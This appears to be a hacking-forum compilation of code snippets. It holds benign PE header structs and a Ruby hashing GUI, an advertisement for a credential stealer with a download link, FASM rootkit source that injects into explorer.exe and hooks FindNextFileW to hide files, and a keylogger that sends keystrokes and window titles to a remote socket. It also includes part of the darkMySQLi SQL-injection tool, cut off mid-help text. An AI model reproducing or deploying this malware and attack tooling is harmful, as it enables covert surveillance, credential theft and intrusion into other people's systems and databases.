
  ; by E0N
; PE (Portable Executable) header layouts, 32-bit (PE32) variant: ImageBase and
; the stack/heap sizes are 4-byte dd fields and BaseOfData is present, so these
; structs do not describe PE32+ (64-bit) images.
; All sizes and offsets quoted below follow from the field widths
; (db = 1, dw = 2, dd = 4 bytes).
;
; NOTE(review): anything that parses untrusted files with these structs must
; bounds-check every value read from the headers (e_lfanew, NumberOfSections,
; SizeOfOptionalHeader, NumberOfRvaAndSizes, SizeOfHeaders, each directory's
; VirtualAddress/Size) against the file or image size before using it as an
; offset, length or loop count.

; Legacy MS-DOS header, 64 bytes (0x40). e_magic is the first word of the file
; (expected 'MZ', 0x5A4D); e_lfanew, at offset 0x3C, holds the file offset of
; IMAGE_NT_HEADERS. Only e_magic and e_lfanew matter for PE parsing; the rest
; describes the DOS stub.
struct IMAGE_DOS_HEADER
  e_magic dw ? ; Magic number
  e_cblp dw ? ; Bytes on last page of file
  e_cp dw ? ; Pages in file
  e_crlc dw ? ; Relocations
  e_cparhdr dw ? ; Size of header in paragraphs
  e_minalloc dw ? ; Minimum extra paragraphs needed
  e_maxalloc dw ? ; Maximum extra paragraphs needed
  e_ss dw ? ; Initial (relative) SS value
  e_sp dw ? ; Initial SP value
  e_csum dw ? ; Checksum
  e_ip dw ? ; Initial IP value
  e_cs dw ? ; Initial (relative) CS value
  e_lfarlc dw ? ; File address of relocation table
  e_ovno dw ? ; Overlay number
  e_res0 dw ? ; Reserved words (4 x dw)
  e_res1 dw ?
  e_res2 dw ?
  e_res3 dw ?
  e_oemid dw ? ; OEM identifier (for e_oeminfo)
  e_oeminfo dw ? ; OEM information; e_oemid specific
  e_res20 dw ? ; Reserved words (10 x dw)
  e_res21 dw ?
  e_res22 dw ?
  e_res23 dw ?
  e_res24 dw ?
  e_res25 dw ?
  e_res26 dw ?
  e_res27 dw ?
  e_res28 dw ?
  e_res29 dw ?
  e_lfanew dd ? ; File address of new exe header (offset 0x3C); validate against file size before following it
ends

; COFF file header, 20 bytes (0x14). Follows the 4-byte Signature inside
; IMAGE_NT_HEADERS.
; NOTE(review): SizeOfOptionalHeader, not sizeof.IMAGE_OPTIONAL_HEADER, gives
; the distance from the end of this struct to the section table; NumberOfSections
; bounds the section-table walk. The field is spelled `Characteristics` in the
; Windows SDK; the lower-case name is kept here because other code may reference it.
struct IMAGE_FILE_HEADER
  Machine dw ? ; target machine type
  NumberOfSections dw ? ; number of section headers after the optional header
  TimeDateStamp dd ?
  PointerToSymbolTable dd ?
  NumberOfSymbols dd ?
  SizeOfOptionalHeader dw ? ; byte length of the optional header that follows
  characteristics dw ? ; image attribute flags (SDK: Characteristics)
ends

; One data-directory entry, 8 bytes. VirtualAddress is an RVA (image-relative),
; not a file offset; Size is in bytes.
struct IMAGE_DATA_DIRECTORY
  VirtualAddress dd ?
  Size dd ?
ends

; PE32 optional header, 224 bytes (0xE0) with all 16 directories present.
; NOTE(review): `SizeOfUnitializedData` is a misspelling of the SDK's
; `SizeOfUninitializedData`, `W32VersionValue` of `Win32VersionValue` and
; `SubSystem` of `Subsystem`; the names are kept unchanged so that existing
; references still assemble.
struct IMAGE_OPTIONAL_HEADER
  ; Standard fields.
  Magic dw ? ; 0x10B identifies a PE32 optional header
  MajorLinkerVersion db ?
  MinorLinkerVersion db ?
  SizeOfCode dd ?
  SizeOfInitializedData dd ?
  SizeOfUnitializedData dd ? ; sic: SDK spelling is SizeOfUninitializedData
  AddressOfEntryPoint dd ? ; RVA of the entry point
  BaseOfCode dd ?
  BaseOfData dd ? ; present only in PE32, absent in PE32+
  ; NT additional fields.
  ImageBase dd ? ; 4 bytes here (PE32); 8 bytes in PE32+
  SectionAlignment dd ?
  FileAlignment dd ?
  MajorOperatingSystemVersion dw ?
  MinorOperatingSystemVersion dw ?
  MajorImageVersion dw ?
  MinorImageVersion dw ?
  MajorSubsystemVersion dw ?
  MinorSubsystemVersion dw ?
  W32VersionValue dd ? ; SDK: Win32VersionValue
  SizeOfImage dd ?
  SizeOfHeaders dd ?
  CheckSum dd ?
  SubSystem dw ? ; SDK: Subsystem
  DllCharacteristics dw ? ; includes the ASLR/DEP/CFG-related flags
  SizeOfStackReserve dd ?
  SizeOfStackCommit dd ?
  SizeOfHeapReserve dd ?
  SizeOfHeapCommit dd ?
  LoaderFlags dd ?
  NumberOfRvaAndSizes dd ? ; how many of the 16 directory slots below are valid; do not read past this count
  ; Data directories, declared as 16 individual fields rather than an array.
  ; DataDirectoryN corresponds to standard directory index N-1.
  DataDirectory1 IMAGE_DATA_DIRECTORY ? ; 0: export table
  DataDirectory2 IMAGE_DATA_DIRECTORY ? ; 1: import table
  DataDirectory3 IMAGE_DATA_DIRECTORY ? ; 2: resource table
  DataDirectory4 IMAGE_DATA_DIRECTORY ? ; 3: exception table
  DataDirectory5 IMAGE_DATA_DIRECTORY ? ; 4: certificate (security) table; a file offset, not an RVA
  DataDirectory6 IMAGE_DATA_DIRECTORY ? ; 5: base relocation table
  DataDirectory7 IMAGE_DATA_DIRECTORY ? ; 6: debug data
  DataDirectory8 IMAGE_DATA_DIRECTORY ? ; 7: architecture-specific data
  DataDirectory9 IMAGE_DATA_DIRECTORY ? ; 8: global pointer
  DataDirectory10 IMAGE_DATA_DIRECTORY ? ; 9: TLS table
  DataDirectory11 IMAGE_DATA_DIRECTORY ? ; 10: load configuration table
  DataDirectory12 IMAGE_DATA_DIRECTORY ? ; 11: bound import table
  DataDirectory13 IMAGE_DATA_DIRECTORY ? ; 12: import address table (IAT)
  DataDirectory14 IMAGE_DATA_DIRECTORY ? ; 13: delay-load import descriptors
  DataDirectory15 IMAGE_DATA_DIRECTORY ? ; 14: CLR (COM+) runtime header
  DataDirectory16 IMAGE_DATA_DIRECTORY ? ; 15: reserved
ends

; NT headers, 248 bytes (0xF8) for PE32: 4-byte Signature (expected 'PE\0\0',
; 0x00004550) followed by the file header and the optional header. Located at
; IMAGE_DOS_HEADER.e_lfanew.
struct IMAGE_NT_HEADERS
  Signature dd ?
  FileHeader IMAGE_FILE_HEADER ?
  OptionalHeader IMAGE_OPTIONAL_HEADER ?
ends
  2. by Exidous [info] Gets IE7, IE8 (Note: Small bug in IE8 Only gets 1 Password.. Will be fixed soon), Firefox 3.X, msn, few game serial keys, windows key, Pc Information, Pidgin, Yahoo, Trillian, and steam! (Still Adding More In!!!) (Soon, Get logs: MSN, Skype, Aol, and ICQ.. Maby trillian idk yet) (Pro Version: Skype Spread, MSN Spread, P2P Spread, USB Spread, Bypass XP Firewall, and Bypass UAC.) Screenshots: Note this is the public version, I will soon have private copys for sale! Also, This is first release.. Please Report Bugs.. ALL THE SPREADING AND BYPASS FEATURES ARE DISABLED IN FREE VERSION! Download: http://www.2shared.com/file/7111098/7fd6afa2/ZH_Stealer_Public_V01.html
  # Credit to protos, the author of this code
require 'digest/md5'
require 'digest/sha1'
require 'base64'
require 'tk'

# Small Tk form: one entry box, three output boxes and two buttons.
# Despite the window title, nothing here encrypts: MD5 and SHA-1 are
# one-way hashes (both broken for collision resistance, and neither is a
# password-hashing function) and Base64 is a reversible encoding. The
# three values are also echoed to stdout with `puts`.
window = TkRoot.new do
  title "Encripter By pRotos"
end

TkLabel.new(window) do
  text "Palabra a Encriptar"
  pack('padx' => 20, 'pady' => 20, 'side' => 'top')
end

# Tk variable bound to the entry; read with #value when a button fires.
palabra = TkVariable.new
TkEntry.new(window) do
  textvariable palabra
  pack
end

# Creates a caption and, beneath it, a 25x2 text box, both packed from the
# bottom edge. Because side => 'bottom' stacks upward, the call order below
# decides the final layout. Returns the text box.
output_box = lambda do |caption|
  TkLabel.new(window) do
    text caption
    pack('side' => 'bottom')
  end
  box = TkText.new(window) do
    width 25
    height 2
  end
  box.pack('side' => 'bottom')
  box
end

md5_box = output_box.call(" MD5")
sha1_box = output_box.call("SHA1")
b64_box = output_box.call("Base64")

# Button action: compute the three encodings of the entry text, print each
# with its label, and append it to the matching text box ('end' => append,
# so repeated clicks accumulate output; "Clear" resets the boxes).
hash_and_show = proc do
  plain = palabra.value
  results = {
    " _MD5_" => [md5_box, Digest::MD5.hexdigest(plain)],
    " _SHA1_" => [sha1_box, Digest::SHA1.hexdigest(plain)],
    " _Base64_" => [b64_box, Base64.encode64(plain)],
  }
  results.each do |label, (box, value)|
    puts label, value
    box.insert('end', value)
  end
end

TkButton.new(window) do
  text " Encripta"
  command hash_and_show
  pack('side' => 'top')
end

# Button action: empty all three output boxes.
clear_all = proc do
  [md5_box, sha1_box, b64_box].each(&:clear)
end

TkButton.new(window) do
  text " Clear "
  command clear_all
  pack('side' => 'bottom')
end

Tk.mainloop
  4. ;------------------------------------------------------------------------------------------------- ; RootKit por Hacker_Zero & YST ; RootKit sin dll que Hookea FindNextFileW en explorer ocultando los archivos que ;comiencen por '#' ;------------------------------------------------------------------------------------------------- include 'C:\fasm\include\win32ax.inc' .code proc start locals ProcessName db "explorer.exe",0 endl stdcall Inyectar,addr ProcessName,FINFuncion-FuncionInyectada,FuncionInyectada,[GetProcAddress] cmp eax,-1 jne salir invoke MessageBoxA,0,"No se encontró el proceso!",0,0 salir: invoke ExitProcess,0 endp proc Inyectar,ProcessName,Tamaño,Funcion,Datos locals struct PROCESSENTRY32 dwSize dd ? cntUsage dd ? th32ProcessID dd ? th32DefaultHeapID dd ? th32ModuleID dd ? cntThreads dd ? th32ParentProcessID dd ? pcPriClassBase dd ? dwFlags dd ? szExeFile rb MAX_PATH ends pInfo PROCESSENTRY32 ? Handle dd ? PID dd ? DirFuncion dd ? hProcess dd ? endl pushad ;Obtenemos el PID del proceso invoke CreateToolhelp32Snapshot,0x00000002,0 mov [Handle],eax mov eax,sizeof.PROCESSENTRY32 mov [pInfo.dwSize], eax BuclePid: invoke Process32Next,[Handle],addr pInfo cmp eax,0 je FinProcBuclePID ;No hay más procesos invoke lstrcmp,addr pInfo.szExeFile,[ProcessName] cmp eax,0 jne BuclePid jmp FinBuclePid FinProcBuclePID: invoke CloseHandle,[Handle] popad mov eax,-1 ret FinBuclePid: invoke CloseHandle,[Handle] push [pInfo.th32ProcessID] pop [PID] ;Lazamos el proceso invoke OpenProcess,PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE,FALSE,[PID] mov [hProcess],eax ;Reservamos espacio en el proceso invoke VirtualAllocEx,[hProcess],0,[Tamaño],MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE mov [DirFuncion],eax ;Escribimos los datos en memoria invoke WriteProcessMemory,[hProcess],[DirFuncion],[Funcion],[Tamaño],0 ;Creamos el hilo invoke CreateRemoteThread,[hProcess],0,0,[DirFuncion],[Datos],0,0 popad mov eax,1 ret endp proc FuncionInyectada,pGetProcAddress locals 
BaseKernel32 dd ? OriginalProtection dd ? endl ;Leemos el PEB para obtener la base de KERNEL32.DLL xor eax, eax add eax,[fs:eax+30h] mov eax, [eax + 0ch] mov esi, [eax + 1ch] lodsd mov eax, [eax + 08h] mov [BaseKernel32],eax ;Obtenemos la dirección de FindNextFileA stdcall [pGetProcAddress],[BaseKernel32],'FindNextFileW' mov ebx,eax stdcall [pGetProcAddress],[BaseKernel32],"VirtualProtect" stdcall eax,ebx,7,PAGE_EXECUTE_READWRITE,addr OriginalProtection ;Calculamos el delta offset call delta delta: pop edx sub edx,delta ;edx=delta ;Lo guardamos en la pila push edx ;Guardamos la dirección de FindNextFileW en la variable dirFindNextFileW add edx,dirFindNextFileW mov dword[edx],ebx pop edx mov ecx,edx add ecx,ApiOriginal mov al,byte[ebx] mov byte[ecx],al mov byte[ebx],0xE9 ;0xE9=jmp inc ebx inc ecx mov eax,dword[ebx] mov dword[ecx],eax mov eax,FuncionHook add eax,edx sub eax,ebx sub eax,4 mov dword[ebx],eax ;la dirección a la que saltará add ebx,4 add ecx,4 mov ax,word[ebx] mov word[ecx],ax mov word[ebx],0x9090 ret ;Terminamos, ya hemos modificado el principio de la api, ;cuando el programa llame a FindNextFileW, saltará a FuncionHook ;-------------------------------------------------------------------------------------------------------------------------------------------- ;Contiene los 7 primeros bytes de la Api FindNextFileW y una rutina para saltar a MessageBox+7 ApiOriginal: ;edx=delta ;7 nops que cambiaremos en tiempo de ejecución por los 7 primeros bytes de FindNextFileW nop nop nop nop nop nop nop add edx,dirFindNextFileW ;Obtenemos la dirección de FindNextFileW leyendo mov eax,dword[edx] ;la variable dirFindNextFileW y la guardamos en eax add eax,7 ;Nos desplazamos 7 bytes jmp eax ;Saltamos a FindNextFileW+7 ;-------------------------------------------------------------------------------------------------------------------------------------------- ;Función a la que salta el programa cuando se llama a la API hookeada proc FuncionHook,hFindFile,lpFindFileData 
Volver: ;Obtenemos el delta offset call delta2 delta2: pop edx sub edx,delta2 ;Llamamos a nuestro buffer push [lpFindFileData] push [hFindFile] mov ecx,edx add ecx,ApiOriginal call ecx cmp eax,0 je Retornar mov ebx,[lpFindFileData] add ebx,44 cmp byte[ebx],'#' jne Retornar jmp Volver Retornar: ret endp ;------------------------------------------------------------------------------------------------------------------------------------------- dirFindNextFileW dd ? endp FINFuncion: .end start
  5. include 'C:\fasm\include\win32ax.inc' .data IP db '127.0.0.1',0 nArch db '\Logdrive.dll',0 nFile db '\Regdrive.exe',0 WinPath dd ? Espacio db '\n',0 saltolinea db 13,10,0 hVentana dd ? Rev dd ? ThreadID dd ? hHook dd ? hSock dd ? hArch dd ? hKey dd ? MyPath dd ? ifSock dd 0 fSize dd ? dLeidos dd ? Buffer dd ? regdisposition dd ? regSubKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0 .code start: ;Creamos un nuevo hilo para el Hook invoke CreateThread,0,4096,Hookear,0,0,[ThreadID] ;Damos tamaño a los registros invoke GlobalAlloc,GPTR,1024h push eax eax eax pop esi ebx edx ;Conexion invoke WSAStartup,200,eax invoke socket,AF_INET,SOCK_STREAM,0 push eax pop [hSock] ;Esi Contiene el Handle de socket mov word[ebx],2 invoke htons,2000 mov word[ebx],2 mov word[ebx+2], AX invoke gethostbyname,IP add eax,32 invoke inet_addr,eax mov dword[ebx+4],eax .BucleConectar: invoke connect,[hSock],ebx,16 cmp eax, 0xFFFFFFFF JE .BucleConectar .BucleRecivir: invoke GlobalAlloc,GPTR,1024h push eax invoke recv,[hSock],eax,1023h,0 mov [Rev],eax pop eax cmp [Rev],0 jng revisar .if dword[eax] = '$Go' mov [ifSock],1 .endif .if dword[eax] = '$Sp' mov [ifSock],0 .endif revisar: cmp [Rev], 0 jne start.BucleRecivir .reiniciar: stdcall dword[closesocket],[hSock] stdcall dword[WSACleanup] jmp start .end start ;Lanzamos el Hook desde un nuevo hilo proc Hookear xor ebx,ebx invoke GetModuleHandleA,ebx invoke SetWindowsHookExA,13,KeyboardHook,eax,ebx mov [hHook],eax invoke GetMessageA,ebx,ebx,ebx,ebx invoke UnhookWindowsHookEx,[hHook] endp ;Proc del Hook donde se detectará la tecla pulsada proc KeyboardHook,nCode,wParam,lParam mov eax,[wParam] cmp eax,WM_KEYDOWN jne siguienteHook mov eax,[lParam] cmp byte[eax],VK_CAPITAL je siguienteHook cmp byte[eax],VK_LSHIFT je siguienteHook cmp byte[eax],VK_RSHIFT je siguienteHook .if byte[eax]=VK_RETURN stdcall EnviarDatos,Espacio jmp siguienteHook .endif .if byte[eax]=VK_BACK stdcall ProcesarTecla,"{BACK}" jmp siguienteHook .endif .if 
byte[eax]=VK_ESCAPE stdcall ProcesarTecla,"{ESC}" jmp siguienteHook .endif .if byte[eax]=VK_TAB stdcall ProcesarTecla,"{TAB}" jmp siguienteHook .endif .if byte[eax]=VK_LCONTROL stdcall ProcesarTecla,"{CTRL}" jmp siguienteHook .endif .if byte[eax]=VK_RCONTROL stdcall ProcesarTecla,"{CTRL}" jmp siguienteHook .endif .if byte[eax]=VK_RMENU stdcall ProcesarTecla,"{ALT}" jmp siguienteHook .endif .if byte[eax]=VK_LMENU stdcall ProcesarTecla,"{ALT}" jmp siguienteHook .endif .if byte[eax]=VK_SPACE stdcall ProcesarTecla," " jmp siguienteHook .endif .if byte[eax]=VK_DELETE stdcall ProcesarTecla,"{DEL}" jmp siguienteHook .endif .if byte[eax]=VK_RWIN stdcall ProcesarTecla,"{WIN}" jmp siguienteHook .endif .if byte[eax]=VK_LWIN stdcall ProcesarTecla,"{WIN}" jmp siguienteHook .endif .if byte[eax]=VK_F1 stdcall ProcesarTecla,"{F1}" jmp siguienteHook .endif .if byte[eax]=VK_F2 stdcall ProcesarTecla,"{F2}" jmp siguienteHook .endif .if byte[eax]=VK_F3 stdcall ProcesarTecla,"{F3}" jmp siguienteHook .endif .if byte[eax]=VK_F4 stdcall ProcesarTecla,"{F4}" jmp siguienteHook .endif .if byte[eax]=VK_F5 stdcall ProcesarTecla,"{F5}" jmp siguienteHook .endif .if byte[eax]=VK_F6 stdcall ProcesarTecla,"{F6}" jmp siguienteHook .endif .if byte[eax]=VK_F7 stdcall ProcesarTecla,"{F7}" jmp siguienteHook .endif .if byte[eax]=VK_F8 stdcall ProcesarTecla,"{F8}" jmp siguienteHook .endif .if byte[eax]=VK_F9 stdcall ProcesarTecla,"{F9}" jmp siguienteHook .endif .if byte[eax]=VK_F10 stdcall ProcesarTecla,"{F10}" jmp siguienteHook .endif .if byte[eax]=VK_F11 stdcall ProcesarTecla,"{F11}" jmp siguienteHook .endif .if byte[eax]=VK_F12 stdcall ProcesarTecla,"{F12}" jmp siguienteHook .endif .if byte[eax]=0xBA stdcall isShift cmp ecx,1 je NoBA stdcall ProcesarTecla,"^" jmp siguienteHook NoBA: stdcall ProcesarTecla,"`" jmp siguienteHook .endif .if byte[eax]=0xBB stdcall isShift cmp ecx,1 je NoBB stdcall ProcesarTecla,"*" jmp siguienteHook NoBB: stdcall ProcesarTecla,"+" jmp siguienteHook .endif .if byte[eax]=0xBC 
stdcall isShift cmp ecx,1 je NoBC stdcall ProcesarTecla,";" jmp siguienteHook NoBC: stdcall ProcesarTecla,"," jmp siguienteHook .endif .if byte[eax]=0xBD stdcall isShift cmp ecx,1 je NoBD stdcall ProcesarTecla,"_" jmp siguienteHook NoBD: stdcall ProcesarTecla,"-" jmp siguienteHook .endif .if byte[eax]=0xBE stdcall isShift cmp ecx,1 je NoBE stdcall ProcesarTecla,":" jmp siguienteHook NoBE: stdcall ProcesarTecla,"." jmp siguienteHook .endif .if byte[eax]=0xBF stdcall isShift cmp ecx,1 je NoBF stdcall ProcesarTecla,"Ç" jmp siguienteHook NoBF: stdcall ProcesarTecla,"ç" jmp siguienteHook .endif .if byte[eax]=0xC0 stdcall isShift cmp ecx,1 je NoC0 stdcall ProcesarTecla,"Ñ" jmp siguienteHook NoC0: stdcall ProcesarTecla,"ñ" jmp siguienteHook .endif .if byte[eax]=0xDB stdcall isShift cmp ecx,1 je NoDB stdcall ProcesarTecla,"?" jmp siguienteHook NoDB: stdcall ProcesarTecla,"'" jmp siguienteHook .endif .if byte[eax]=0xDC stdcall isShift cmp ecx,1 je NoDC stdcall ProcesarTecla,"ª" jmp siguienteHook NoDC: stdcall ProcesarTecla,"º" jmp siguienteHook .endif .if byte[eax]=0xDD stdcall isShift cmp ecx,1 je NoDD stdcall ProcesarTecla,"¿" jmp siguienteHook NoDD: stdcall ProcesarTecla,"¡" jmp siguienteHook .endif .if byte[eax]=0xDE stdcall isShift cmp ecx,1 je NoDE stdcall ProcesarTecla,"¨" jmp siguienteHook NoDE: stdcall ProcesarTecla,"´" jmp siguienteHook .endif .if byte[eax]=0x30 stdcall isShift cmp ecx,1 je No0 stdcall ProcesarTecla,"=" jmp siguienteHook No0: stdcall ProcesarTecla,"0" jmp siguienteHook .endif .if byte[eax]=0x31 stdcall isShift cmp ecx,1 je No1 stdcall ProcesarTecla,"!" 
jmp siguienteHook No1: stdcall ProcesarTecla,"1" jmp siguienteHook .endif .if byte[eax]=0x32 stdcall isShift cmp ecx,1 je No2 stdcall ProcesarTecla,'"' jmp siguienteHook No2: stdcall ProcesarTecla,"2" jmp siguienteHook .endif .if byte[eax]=0x33 stdcall isShift cmp ecx,1 je No3 stdcall ProcesarTecla,"·" jmp siguienteHook No3: stdcall ProcesarTecla,"3" jmp siguienteHook .endif .if byte[eax]=0x34 stdcall isShift cmp ecx,1 je No4 stdcall ProcesarTecla,"$" jmp siguienteHook No4: stdcall ProcesarTecla,"4" jmp siguienteHook .endif .if byte[eax]=0x35 stdcall isShift cmp ecx,1 je No5 stdcall ProcesarTecla,"%" jmp siguienteHook No5: stdcall ProcesarTecla,"5" jmp siguienteHook .endif .if byte[eax]=0x36 stdcall isShift cmp ecx,1 je No6 stdcall ProcesarTecla,"&" jmp siguienteHook No6: stdcall ProcesarTecla,"6" jmp siguienteHook .endif .if byte[eax]=0x37 stdcall isShift cmp ecx,1 je No7 stdcall ProcesarTecla,"/" jmp siguienteHook No7: stdcall ProcesarTecla,"7" jmp siguienteHook .endif .if byte[eax]=0x38 stdcall isShift cmp ecx,1 je No8 stdcall ProcesarTecla,"(" jmp siguienteHook No8: stdcall ProcesarTecla,"8" jmp siguienteHook .endif .if byte[eax]=0x39 stdcall isShift cmp ecx,1 je No9 stdcall ProcesarTecla,")" jmp siguienteHook No9: stdcall ProcesarTecla,"9" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD0 stdcall ProcesarTecla,"0" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD1 stdcall ProcesarTecla,"1" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD2 stdcall ProcesarTecla,"2" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD3 stdcall ProcesarTecla,"3" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD4 stdcall ProcesarTecla,"4" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD5 stdcall ProcesarTecla,"5" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD6 stdcall ProcesarTecla,"6" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD7 stdcall ProcesarTecla,"7" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD8 stdcall ProcesarTecla,"8" jmp siguienteHook .endif cmp byte[eax],65 ;VK_A jl 
siguienteHook cmp byte[eax],90 ;VK_Z jg siguienteHook ;Letras A-Z stdcall isShift cmp ecx,1 jne listo mov eax,[lParam] add byte[eax],32 listo: stdcall ProcesarTecla,eax siguienteHook: invoke CallNextHookEx,[hHook],[nCode],[wParam],[lParam] ret endp proc ProcesarTecla,tecla ; Procesa la tecla capturada ;cmp [ifSock],1 ;je sEnviar ;sGuardar: ;invoke GetWindowsDirectory,WinPath,1024 ;invoke lstrcat,WinPath,nArch ;invoke CreateFile,WinPath,GENERIC_READ,0,0,OPEN_ALWAYS,0,0 ;mov [hArch],eax ;invoke GetFileSize, [hArch],NULL ;mov [fSize],eax ;invoke LocalAlloc, LPTR,[fSize] ;mov [Buffer],eax ;invoke ReadFile,[hArch],[Buffer],[fSize],dLeidos,NULL ;invoke CloseHandle,[hArch] ;invoke lstrcat,[Buffer],[tecla] ;invoke CreateFile,WinPath,GENERIC_WRITE,0,0,CREATE_ALWAYS,0,0 ;invoke lstrlen,[Buffer] ;invoke WriteFile,[hArch],[Buffer],eax,dLeidos,NULL ;invoke CloseHandle,[hArch] ;ret sEnviar: invoke GetForegroundWindow cmp eax,[hVentana] je enviartecla mov [hVentana],eax invoke GlobalAlloc,GPTR,256 push eax invoke GetWindowText,[hVentana],eax,256 pop eax mov ebx,eax stdcall EnviarDatos,Espacio stdcall EnviarDatos,Espacio stdcall EnviarDatos,ebx stdcall EnviarDatos,Espacio enviartecla: stdcall EnviarDatos,[tecla] ret endp proc EnviarDatos,datos invoke lstrlen,[datos] invoke send,[hSock],[datos],eax,0 ret endp ;Función para obtener el estado de las mayúsculas proc isShift invoke GetKeyState,VK_CAPITAL cmp eax,1 jl pulsada jmp nopulsada pulsada: invoke GetKeyState,VK_SHIFT cmp eax,1 jg noShift jmp siShift nopulsada: invoke GetKeyState,VK_SHIFT cmp eax,1 jg siShift jmp noShift siShift: ; Retornamos 0 si está mayúscula, 1 si no mov ecx,1 ret noShift: mov ecx,0 ret endp
  6. # *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker #!/usr/bin/python # 1/30/09 ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # Multi-Purpose MySQL Injection Tool # FUNCTIONS # *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker # FEATURES # *Round Robin Proxy w/ a proxy list (non-auth or auth proxies) # *Proxy Auth (works great with Squid w/ basic auth) # *Random browser agent chosen everytime the script runs # *debug mode for seeing every URL request, proxy used, browser agent used # Share the c0de! (f*ck Windows! Get a real OS!) # darkc0de Crew # www.darkc0de.com # rsauron[at]gmail[dot]com # Greetz to # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen # and the darkc0de crew # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # Intended for authorized Web Application Pen Testing! 
# CHANGES # 1.6 ADDED --end evasion setting # 1.5 Fixed --strart now starts at correct number instead of +1 # 1.4 Fixed schema mode when a table was specified - app would hand after last column # 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping) # 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string # BE WARNED, THIS TOOL IS VERY LOUD.. import urllib, sys, re, os, socket, httplib, urllib2, time, random ##Set default evasion options here arg_end = "--" # examples "--", "/*", "#", "%00", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point arg_eva = "+" # examples "/**/" ,"+", "%20" ## colMax variable for column Finder colMax = 200 ## Set the default timeout value for requests socket.setdefaulttimeout(10) ## Default Log File Name logfile = "darkMySQLi.log" ## File Location to fuzz with for TABLE fuzzer tablefuzz = "tablesfuzz.txt" ## File Location to fuzz with for COLUMN fuzzer columnfuzz = "columnsfuzz.txt" ## File Location to fuzz with for LOAD_FILE fuzzer loadfilefuzz = "loadfilefuzz.txt" ## Agents agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Microsoft Internet Explorer/4.0b1 (Windows 95)", "Opera/8.00 (Windows NT 5.1; U; en)"] #URL Get Function def GetThatShit(head_URL): source = "" global gets;global proxy_num head_URL = head_URL.replace("+",arg_eva) request_web = urllib2.Request(head_URL) request_web.add_header('User-Agent',agent) while len(source) < 1: if arg_debug == "on": print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" try: gets+=1;proxy_num+=1 source = proxy_list[proxy_num % proxy_len].open(request_web).read() except (KeyboardInterrupt, SystemExit): raise except (urllib2.HTTPError): print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!" 
print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" break except: print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" raise return source #the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology def GuessValue(URL): lower = lower_bound;upper = upper_bound while lower < upper: try: mid = (lower + upper) / 2 head_URL = URL + ">"+str(mid) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: lower = mid + 1 else: upper = mid except (KeyboardInterrupt, SystemExit): raise except: pass if lower > lower_bound and lower < upper_bound: value = lower else: head_URL = URL + "="+str(lower) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: value = lower else: value = 63 print "Could not find the ascii character! There must be a problem.." print "Check to make sure your using the my script right!" 
print "READ xprog's blind sql tutorial!\n" sys.exit(1) return value ## Functions for MySQL5 hash cracking --- THANKS d3hydr8 def c1(word): s = hashlib.sha1() s.update(word[:-1]) s2 = hashlib.sha1() s2.update(s.digest()) return s2.hexdigest() def c2(word): s = sha.new() s.update(word[:-1]) s2 = sha.new() s2.update(s.digest()) return s2.hexdigest() ## Funtion for MySQL323 hash cracking def mysql323(clear): # Taken almost verbatim from mysql's source nr = 1345345333 add = 7 nr2 = 0x12345671 retval = "" for c in clear: if c == ' ' or c == '\t': continue tmp = ord(c) nr ^= (((nr & 63) + add) * tmp) + (nr << 8) nr2 += (nr2 << 8) ^ nr add += tmp res1 = nr & ((1 << 31) - 1) res2 = nr2 & ((1 << 31) - 1) return "%08lx%08lx" % (res1, res2) #say hello if len(sys.argv) <= 1: print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" sys.exit(1) #help option for arg in sys.argv: if arg == "-h" or arg == "--help": print "\n darkMySQLi v1.6 rsauron@gmail.com" print " forum.darkc0de.com" print "Usage: ./darkMySQLi.py [options]" print "Options:" print " -h, --help shows this help message and exits" print " -d, 